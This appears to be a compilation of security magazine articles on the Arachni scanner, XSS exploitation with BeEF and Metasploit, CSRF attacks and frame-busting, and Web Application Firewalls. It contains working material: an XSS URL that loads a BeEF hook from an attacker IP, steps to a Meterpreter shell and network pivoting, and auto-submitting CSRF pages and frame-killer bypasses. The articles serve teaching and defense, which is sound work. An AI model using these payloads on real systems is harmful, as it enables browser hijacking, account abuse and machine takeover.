Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.
Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as follows (Listing 3).
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if yes, it forwards the name to the Arachni Trainer (which will include the directory in further scans) as well as creating a report entry for it.
Note: the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:
• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).
Arachni lacks support for the following:
• No AJAX and JSON support
• No JavaScript support
This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You'll need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.
Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a career of 15 years spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports it's sufficient to just show a small alert popup to prove that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.
In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you too can use on your web server if you want to try this:
HTML Page

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search"></INPUT>
<INPUT TYPE="submit" name="Submit" value="Submit"></INPUT>
</FORM>
</BODY>
</HTML>
XSS - BeEF - Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is only limited by the potency of the attacker's JavaScript code.
Figure 1. User enters a script in a search box
and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Here is a screenshot of how BeEF looks after it is configured (Figure 2).
Instead of clicking on a link which generates a popup box, the user will this time be tricked into clicking a link which tells his browser to connect to the BeEF controller. The URL that the user has to click on is:
http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit
The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a Zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Here is a screenshot which shows that a browser has connected to the BeEF controller (Figure 3).
Click and highlight the zombie in the left pane and then click on Standard Modules - Alert Dialog. This will result in a little popup box on the victim machine. Here's a screenshot which shows the same (Figure 4). And this is what the victim will see (Figure 5).
So as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more
Server-Side PHP Code

<?php
$a = $_GET['search'];
echo "The parameter passed is $a";
?>
As you can see, it's some very simple code: the user enters something in a search box on the first page, his input is sent to the server, which reads the value of the parameter and prints it to the screen. So if, instead of simple text, the attacker enters JavaScript into the box, the JavaScript will execute on the user's machine and not get displayed. The user hence just has to be tricked into clicking on a link: http://localhost/search1.php?search=<script>alert(document.domain)</script>

The screenshot below clarifies the above steps (Figure 1).
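The vulnerable reflection can also be sketched outside PHP. The following is a hypothetical Ruby equivalent of search1.php (the function name and structure are mine, not from the article; only Ruby's standard CGI library is used):

```ruby
require 'cgi'

# Hypothetical stand-in for search1.php: the 'search' parameter is
# URL-decoded and reflected verbatim, with no output encoding.
def search_page(query_string)
  params = CGI.parse(query_string)     # decodes %3C -> '<', etc.
  a = params['search'].first.to_s
  "The parameter passed is #{a}"       # reflected XSS: unescaped output
end

puts search_page('search=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E')
# => The parameter passed is <script>alert(document.domain)</script>
```

Escaping the parameter before interpolating it, as recommended in the Mitigation section at the end, is the one-line fix.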
BeEF - Hook the user's browser
Now while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.
I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool. The newer version has been rewritten completely and has many more features. For now though, extract BeEF from the tarball, copy it into your web server directory
Figure 3. Connection with the BeEF controller

Figure 4. What the attacker will see

Figure 5. What the victim will see

Figure 6. Defacing the current web page
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.
I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. Here are the screenshots for the same; these are all a result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten in the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside BeEF, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate BeEF with Metasploit and get a shell
Edit BeEF's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside BeEF.
Figure 7. Detecting plugins on the user's browser

Figure 8. Starting Metasploit

Figure 9. The jobs command

Figure 10. Metasploit after clicking Send Now

Figure 11. Meterpreter window - screenshot 1

Figure 12. Meterpreter window - screenshot 2
Now first ensure that the Zombie is still connected. Then click on Standard Modules - Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf> prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if BeEF can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the selected exploit (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figures 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools, like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install them on this machine. We can then use these to port-scan an entire internal network or search for vulnerabilities in services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13. Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output as in a) must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for the same.
• White-list and black-list filtering can also be used to completely disallow specific characters in user input fields.
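The encoding step in the second bullet can be sketched in Ruby (a hypothetical example using the standard library's CGI.escapeHTML, not code from the article; the payload mirrors the earlier proof of concept):

```ruby
require 'cgi'

# The same payload used in the earlier proof of concept
payload = "<script>alert(document.domain)</script>"

# Echoing it verbatim, like the vulnerable search1.php, would let the
# browser execute it. Encoding the output first renders it inert text:
safe = "The parameter passed is " + CGI.escapeHTML(payload)
puts safe
# => The parameter passed is &lt;script&gt;alert(document.domain)&lt;/script&gt;
```

The browser now displays the tag as text instead of running it.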
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, then the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an Information Security Professional with 6 years of experience in System/Network and Web Application Penetration Testing. In addition, he freelances in information security audits, trainings and product development [Perl, Ruby on Rails], while spending a lot of time learning more about malware analysis and reverse engineering. Email: arvind.doraiswamy@gmail.com. LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39/b21/332. Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
• https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words: an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
     style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
Only accept POST: This stops simple link-based attacks (IMG, frames, etc.), but hidden POST requests can be created within frames, scripts, etc.
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
Defense
The approach used by many web developers is CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to type the text shown in a CAPTCHA image every time they submit a form might make them stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a hidden form field and in the session at the same time.
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the currently active session of an authorized user.
Listing 1. HTML code used to bypass the protection

<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame" method="POST">
<input type="text" name="message" value="I like www.evil.com" />
<input type="submit" />
</form>
<script>document.Form.submit()</script>
</div>
index.php (victim website)

And the webpage which processes the request and stores the message only if the given token is correct:

post.php (victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:

Permission denied to access property 'document'

for code such as:

var token = window.frames[0].document.forms['messageForm'].token.value;
A browser's settings are not hard to modify, so the best way to achieve web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:

<script type="text/javascript">
if (top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.

Common conditional statements are the following:

if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
The one-time token is stored in a webpage form's hidden field and in a session variable at the same time, so the two values can be compared after the page form is submitted.
One-time tokens are usually subverted by brute-force attacks, and brute forcing one-time tokens pays off only if the generation mechanism is widely used by web developers. For example, the following PHP code:

<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2):
Listing 2. index.php with a one-time token (victim website)

<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
<form name="messageForm" action="post.php" method="POST">
<input type="text" name="message">
<input type="submit" value="Post">
<input type="hidden" name="token" value="<?php echo $token; ?>">
</form>
</body>
</html>
Listing 3. post.php verifying the token (victim website)

<?php
session_start();
if ($_SESSION['token'] == $_POST['token']) {
    $message = $_POST['message'];
    echo "<b>Message:</b><br>$message";
    $file = fopen("messages.txt", "a");
    fwrite($file, "$message\r\n");
    fclose($file);
} else {
    echo "Bad request";
}
?>
And common counter-action statements are these:

top.location = self.location
top.location.href = document.location.href
top.location.replace(self.location)
top.location.href = window.location.href
top.location.replace(document.location)
top.location.href = "URL"
document.write('')
top.location.replace('URL')
top.location.replace(window.location.href)
top.location.href = location.href
self.parent.location = document.location
parent.location.href = self.document.location
Different FrameKillers are used by web developers, and different techniques are used to bypass them.
Method 1

<script>
window.onbeforeunload = function() {
    return "Do you want to leave this page?";
}
</script>
<iframe src="http://www.good.com"></iframe>
Method 2
Using double framing:

<iframe src="second.html"></iframe>

second.html:

<iframe src="http://www.site.com"></iframe>
Best Practices
And the best example of a FrameKiller is the following:

<style> html { display: none; } </style>
<script>
if (self == top) {
    document.documentElement.style.display = 'block';
} else {
    top.location = self.location;
}
</script>

This protects the web application even if an attacker opens the webpage with JavaScript disabled in the browser.
SAMVEL GEVORGYAN
Founder & Managing Director, CYBER GATES
www.cybergates.am | samvelgevorgyan@cybergates.am
Samvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting, Testing and Research Company and has over 5 years of experience working in the IT industry. He started his career as a web designer in 2006, then seriously began learning web programming and web security concepts, which allowed him to gain more knowledge in web design, web programming techniques and information security. All this experience contributed to Samvel's work ethic, for he started to pay attention to each line of code for good optimization and protection from different kinds of malicious attacks such as XSS (Cross-Site Scripting), SQL Injection, CSRF (Cross-Site Request Forgery), etc. Thus Samvel has taken his job to a higher level and is gradually becoming a more complete security professional.
References
• Cross-Site Request Forgery – http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF), http://projects.webappsec.org/w/page/13246919/Cross-Site-Request-Forgery
• Same Origin Policy
• FrameKiller (Frame Busting) – http://en.wikipedia.org/wiki/Framekiller, http://seclab.stanford.edu/websec/framebusting/framebust.pdf
Listing 4. Real scenario of the attack

<html>
<head>
<title>BAD.COM</title>
<script>
function submitForm() {
    var token = window.frames[0].document.forms["messageForm"].elements["token"].value;
    var myForm = document.myForm;
    myForm.token.value = token;
    myForm.submit();
}
</script>
</head>
<body onLoad="submitForm()">
<div style="display:none">
<iframe src="http://good.com/index.php"></iframe>
<form name="myForm" target="hidden" action="http://good.com/post.php" method="POST">
<input type="text" name="message" value="I like www.bad.com" />
<input type="hidden" name="token" value="" />
<input type="submit" value="Post">
</form>
</div>
</body>
</html>
WEB APPLICATION CHECKING
Web applications are currently being used by hackers on a grand scale as gateways into corporate networks. Web Application Firewalls (WAFs) make it a lot more difficult to penetrate networks.

In most commercial and non-commercial areas the
internet has developed into an indispensable medium that offers users a huge number of interesting and important applications. Information procurement of any kind, buying services or products, but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen. Waiting times are a thing of the past, and while we used to have to search laboriously for information, we now have search engines that deliver results in a matter of seconds. And so browsers and the web today dominate the majority of daily procedures in both our private and our working lives. In order to facilitate all of these processes, a broad range of applications is required, provided more or less publicly. Their range extends from simple applications for searching for product information or forms up to complex systems for auctions, product orders, internet banking or processing quotations. They even control access to the company's own intranet.
A major reason for these rapid developments is the almost unlimited possibilities to simplify and accelerate business processes and make them more productive. Most enterprises and public authorities also see the web as an opportunity to make enormous cost savings, benefit from additional competitive advantages and open up new business opportunities. This requires a growing number of more powerful applications that provide the internet user with the required functions as fast and simply as possible.
Developers of such software programs are under enormous cost and time pressure. An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products, services and information as quickly, simply and diversely as possible. So guidelines for safe programming and release processes are usually either not available or not heeded. In the end this results in programming errors, because major security aspects are deliberately disregarded or simply forgotten. Productive use usually follows soon after development, without the developers having sufficiently checked the security status of the web applications.
Above all, the common practice of adapting tried and tested technologies for developing web applications without subjecting them to prior security and qualification tests is dangerous. In the belief that the existing network firewall will provide the required protection should weaknesses become apparent, those responsible unwittingly grant access to systems within the corporate boundaries. And thereby
First the Security Gate, then the Airplane
What needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master. The subject of security, however, is often an afterthought. But with web applications the backlash comes quickly, because many are accessible to everyone, worldwide.
professional software engineering was not necessarily at the top of the agenda. So web applications usually went into productive operation without any clear security standards. Their security standard was based solely on how the individual developers rated this aspect and how deep their respective knowledge was.
The problem with more recent web applications: many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic. These include, for example, Ajax and JavaScript. While the browser was originally only a passive tool for viewing web sites, it has now evolved into an autonomous, active element, actually a kind of operating system for the plug-ins and add-ons. But that makes the browser and its tools vulnerable. The attackers gain access to the browser via infected web applications, and as such to further systems and to their owners' or users' sensitive data.
Some assume that an unsecured web application cannot cause any damage as long as it neither performs security-relevant functions nor provides sensitive data. This is completely wrong; the opposite is the case. A single unsecured web application endangers the security of downstream systems such as application or database servers. Equally wrong is the common misconception that the telecom providers' security services would protect the data. Providers are not responsible for the safe use of web applications, regardless of where they are hosted. Suppliers and operators of web applications are the ones who bear the big responsibility here, towards all those who use their applications, and it is one they often do not fulfill.
they disclose sensitive data and make processes vulnerable. But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications.
As a result, critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible on the web. Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here. Particularly in association with the web, the security requirements for applications have a different focus and are much higher than for traditional network security. The requirements for service providers who conduct security checks on business-critical systems with penetration tests should then also be correspondingly higher.
While most companies in the meantime protect their networks to a relatively high standard, the hackers have long since moved on to a different playing field: they now take advantage of security loopholes in web applications. There are several reasons for this. Compared with the network level, you don't need to be highly skilled to use the internet. This not only makes legitimate use easier but also encourages the malicious misuse of web applications. In addition, the internet offers many possibilities for concealment and for acting anonymously. As a result the risk for attackers remains relatively low, and so does the inhibition threshold for hackers.
Many web applications that are still active today were developed at a time when awareness of application security on the internet had not yet been raised. There were hardly any threat scenarios, because the attackers' focus was directed at the internal IT structure of the companies. In the first years of web usage in particular,
Figure 1. This model (based on Everett M. Rogers' adoption curve from "Diffusion of Innovations") shows a time lag between the adoption of a new technology and the securing of that technology. Both exhibit a similar Technology Adoption Lifecycle. There is an inflection point when a technology becomes widely enough accepted, and therefore economically relevant for hackers, resulting in a period of Peak Vulnerability. Bottom line: security is an afterthought.
Web Applications Under Fire
The security issues of web applications have not escaped the attackers, and they have been exploiting these shortcomings in IT environments for some time now. There are numerous attack scenarios through which they can obtain access to corporate data and processes, or even external systems, via web applications. For years now the major types have been:

• All injection attacks (such as SQL Injection, Command Injection, LDAP Injection, Script Injection, XPath Injection)
• Cross Site Scripting (XSS)
• Hidden Field Tampering
• Parameter Tampering
• Cookie Poisoning
• Buffer Overflow
• Forceful Browsing
• Unauthorized access to web servers
• Search Engine Poisoning
• Social Engineering
The only more recent trend: the attackers have started to combine these methods more often in order to obtain even higher success rates. And here it is no longer just the large corporations who are targeted, because they usually guard and conceal their systems better. Instead, an increasing number of smaller companies are now in the crossfire.
One Example
Attackers know that a certain commercial software program is widely used for shopping carts in online shops, and that the smaller companies rarely patch its weak points. They launch automated attacks in order to identify, with high efficiency, as many worthwhile targets as possible on the web. In this step they already gather the required data about the underlying software, the operating system or the database from web applications which give away information freely. The attackers then only have to evaluate this information. As such, they have an extensive basis for later targeted attacks.
How to Make a Web Application Secure
There are two ways of actually securing the data and processes that are connected to web applications. The first way would be to program each application absolutely error-free, under the required application conditions and security aspects, according to predefined guidelines. Companies would also have to raise the security of older web applications to the required standards later.
However, this intention is generally doomed to failure from the outset, because the later integration of security functions into an existing application is in most cases not only difficult but above all expensive. For example, a program that has until now not processed its inputs and outputs via centralized interfaces is to be enhanced so that the data can be checked. It is then not sufficient to just add new functions; the developers must start by precisely analyzing the program and then make deep inroads into its basic structures. This is not only tedious but also harbors the danger of making mistakes. Another example is programs that do not use more than the session attributes for authentication. In this case it is not straightforward to update the session ID after logging in, which makes the application susceptible to Session Fixation.
If existing web applications display weak spots (and the probability is relatively high), then it should be clarified whether it makes business sense to correct them. It should not be forgotten here that other systems are put at risk by the unsecured application. A risk analysis can clarify whether and to what extent the problems must be resolved, or if further measures should be taken at the same time. Often, however, the program developers are no longer available, and training new developers as well as analyzing the web application results in additional costs.
The situation is not much better with web applications that are developed from scratch. No software program ever went into productive operation free of errors or without weak spots; the shortcomings are frequently uncovered only over time. And by this time, correcting the errors is once again time-consuming and expensive. In addition, the application cannot be deactivated during this period if it works as a sales driver or supports an important business process. Despite this, the demand for good code that sensibly combines effectiveness, functionality and security still has top priority: the more safely a web application is written, the less improvement work and the less complex the external security measures that have to be adopted.
The second approach, in addition to secure programming, is the general safeguarding of web applications with a special security system from the time they go into operation. Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications.
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP). As such, it represents a special case of Application-Level Firewalls (ALF) or Application-Level Gateways (ALG). In contrast with classic firewalls and Intrusion Detection
systems (IDS), a WAF checks the communications at the application level. Normally the web application to be protected does not have to be changed.
Secure programming and WAFs are not contradictory but actually complement each other. By analogy with air traffic: it is without doubt important that the airplane (the application itself) is well serviced and safe. But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall), which, as the first security layer, considerably minimizes the risks of attacks on any weak spots.
After introducing a WAF it is still advisable to have the security functions checked by penetration testers. This might reveal, for example, that the system can be misused via SQL Injection by entering inverted commas. It would be a costly procedure to correct this error in the web application; if a WAF is deployed as a protective system, it can instead be configured to filter the inverted commas out of the data traffic. This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis; this would lead to misjudging the achieved security status. Filtering out special characters does not always prevent an attack based on the SQL Injection principle. Additionally, the system performance would suffer, as the security rules would have to be set as restrictively as possible in order to exclude all possible threats. In this context, too, penetration tests make an important contribution to increasing Web Application Security.
WAF Functionality
A major advantage of WAFs is that one single system can close the security loopholes of several web
applications. If they are run in redundant mode, they can also perform load balancing functions in order to distribute data traffic better and increase the performance of the web applications. With content caching functions they reduce the load on the backend web servers, and via automated compression procedures they reduce the bandwidth requirements of the client browser.
In order to protect the web applications, the WAF filters the data flow between the browser and the web application. If an entry pattern emerges that is defined as invalid, the WAF interrupts the data transfer or reacts in another way predefined in its configuration. If, for example, two parameters have been defined for a monitored entry form, the WAF can block all requests that contain three or more parameters. The length and the contents of parameters can be checked in the same way. Many attacks can be prevented, or at least made more difficult, just by specifying general rules about parameter quality, such as maximum length, valid characters and the permitted value range.
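The parameter rules described above can be sketched as a small filter function. This is an illustrative sketch only, not a real WAF rule syntax; the field names and limits are invented:

```javascript
// Hedged sketch of WAF-style parameter checks: reject requests with
// too many parameters, unknown parameters, over-long values, or
// values outside the allowed character set.
const rules = {
  maxParams: 2,
  fields: {
    message: { maxLength: 140, allowed: /^[\w .,!?-]*$/ },
    token:   { maxLength: 64,  allowed: /^[0-9a-f]*$/ }
  }
};

function checkRequest(params, rules) {
  const names = Object.keys(params);
  if (names.length > rules.maxParams) return false;
  return names.every(name => {
    const rule = rules.fields[name];
    if (!rule) return false; // unknown parameter
    const value = String(params[name]);
    return value.length <= rule.maxLength && rule.allowed.test(value);
  });
}
```

A request carrying an extra parameter, or a quote-laden injection payload in `message`, fails the check without the WAF needing to know the specific attack.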
Of course, an integrated XML firewall should also be standard these days, because more and more web applications are based on XML code. This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning. A fully developed rule set for access rates, with finely adjustable guidelines, also eliminates the negative consequences of Denial of Service or Brute Force attacks. However, every file that is uploaded to the web application can represent a danger if it contains a virus, worm, Trojan or similar, so a virus scanner integrated into the WAF should check every file before it is passed to the web application.
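The access-rate rule mentioned above amounts to rate limiting per client. A minimal sliding-window sketch (illustrative only; real WAFs use their own thresholds and state stores):

```javascript
// Hedged sketch of a per-IP sliding-window rate limiter: at most
// `limit` requests per `windowMs` milliseconds; excess requests
// within the window are rejected.
class RateLimiter {
  constructor(limit, windowMs) {
    this.limit = limit;
    this.windowMs = windowMs;
    this.hits = new Map(); // ip -> array of request timestamps
  }
  allow(ip, now = Date.now()) {
    const recent = (this.hits.get(ip) || [])
      .filter(t => now - t < this.windowMs);
    if (recent.length >= this.limit) {
      this.hits.set(ip, recent);
      return false; // over the limit within the window
    }
    recent.push(now);
    this.hits.set(ip, recent);
    return true;
  }
}
```

Brute-force login attempts and simple flooding both hit the same ceiling, while normal browsing stays under it.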
Figure 2. An overview of how a Web Application Firewall works
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser, for example when a web application does not sufficiently check the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; whitelist-only approaches quickly become outdated due to the constant tuning required to maintain the whitelist profiles. The contrary blacklist-only approach, on the other hand, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard usages like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections like an order entry page.
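The combined approach can be sketched as follows: generic blacklist signatures screen all traffic, while a learned whitelist additionally guards a high-value sub-section. The URLs and patterns here are invented for illustration:

```javascript
// Hedged sketch of combined whitelist + blacklist inspection.
const whitelist = new Set(['/order/entry', '/order/confirm']);
const blacklist = [
  /<script\b/i,           // reflected XSS probe
  /\bunion\s+select\b/i,  // classic SQL injection
  /\.\.\//                // path traversal
];

function inspect(url, body) {
  // Negative security: block known attack patterns everywhere.
  if (blacklist.some(rx => rx.test(url) || rx.test(body))) return 'block';
  // Positive security: the high-value order section must match the
  // learned whitelist profile exactly.
  if (url.startsWith('/order/') && !whitelist.has(url)) return 'block';
  return 'allow';
}
```

Ordinary pages only pay the blacklist cost, so application changes outside the order section need no re-learning.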
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that possibly violate the policies but, based on an extensive heuristic analysis, can still be categorized as legitimate. At the same time, the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as it is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF has the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode, and certain special functions are only available here. As a Full Reverse Proxy a WAF provides, for example, Instant SSL, which converts HTTP pages into HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, overwriting the URLs used by public requests to the web application's hidden URL. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Level 7 rules (to avoid Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3. A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks with which attackers seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But the Proxy WAFs must also be configured according to the respective requirements; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots, they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for distributing and storing Primary Account Number (PAN) information. The companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes that are intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:

• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there simple SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is the protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible withdrawal of sensitive data and then stops it.
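Outbound inspection of this kind can be sketched as a simple masking filter for anything that looks like a PAN in a response body. This is an illustrative sketch; a production WAF would also Luhn-check candidates to reduce false positives:

```javascript
// Hedged sketch of outbound data masking: hide 16-digit card-number
// patterns (digits optionally separated by spaces or hyphens),
// keeping only the last four digits.
function maskPans(body) {
  return body.replace(/\b(?:\d[ -]?){12}(\d{4})\b/g, '****-****-****-$1');
}
```

A response leaking a full card number would then reach the browser with only its last four digits intact.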
Penetration testers can fall back on web scanners to run security checks on web applications. Several WAFs provide extra interfaces to automate such tests.
